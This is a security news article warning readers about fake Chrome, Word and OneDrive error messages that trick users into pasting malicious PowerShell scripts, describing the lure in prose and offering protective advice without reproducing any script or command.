HomeNewsBeware of Fake Error Messages Deploying Malware
Image – Bleeping Computer
Recent cyber attacks have employed a clever social engineering technique to trick users into running malicious PowerShell scripts on their computers. Multiple threat actors, including the notorious TA571 spam group and a cluster named “ClearFake”, have been using fake browser and document errors to deploy various malware payloads.
The Attack Vector
The attacks begin with users either visiting a compromised website or receiving a malicious HTML attachment pretending to be a Word document or file hosted on OneDrive. The malicious code on the webpage or within the HTML file displays a realistic-looking error message stating there is a problem with Google Chrome, Word, or OneDrive.
Fake Google Chrome error Source: Proofpoint
The fake error messages instruct the user to run a “fix” by copying a PowerShell script into their clipboard and pasting it into either the PowerShell terminal, Windows Run dialog, or directly running it. When executed, the PowerShell script initiates a sequence of events leading to the download and installation of malware on the victim’s system.
Malware Payloads
The PowerShell scripts have been observed deploying a range of malicious payloads, including:
The payloads allow the attackers to gain remote control, steal data, mine cryptocurrencies, and perform other malicious activities on the compromised systems.
Clever Social Engineering
While the attack requires user interaction to succeed, the social engineering tactics make it deceptively convincing. The fake error messages mimic legitimate warnings, providing both a perceived problem and solution in a single display. Users may be prompted to act quickly before considering the potential risks.
Furthermore, the fact that the malicious code is run directly from the clipboard rather than an executable file may bypass some security protections that scan for and block malware files.
Protect Yourself
To avoid falling victim to these types of attacks, exercise caution with any prompts to copy/paste and run commands, even if they appear to be from trusted sources like operating systems or productivity software. Double check the validity of such warnings through official support channels before following instructions.
Maintain updated security software, browse the web cautiously, and think critically before enabling any suspicious scripts, downloads, or programs. User education is crucial to identify and report these social engineering attempts.
If you suspect your system has been compromised, immediately disconnect from the network, run anti-malware scans, and contact cyber security professionals to remediate the infection.
Stay vigilant against evolving cyber threats that employ clever tactics to bypass security measures. With proper awareness and precautions, you can protect yourself and your organisation from malware deployment schemes abusing trusted system utilities.
A serious security flaw has been uncovered in a popular Facebook module for the e-commerce platform PrestaShop, potentially exposing thousands of online shops and their…
Cyber criminals are increasingly exploiting trusted high street brands like Asda to lure unsuspecting victims into phishing scams. Action Fraud, the UK’s national fraud and…
Google has released an urgent security update for the Chrome web browser to address several high-severity vulnerabilities that could allow attackers to take control of…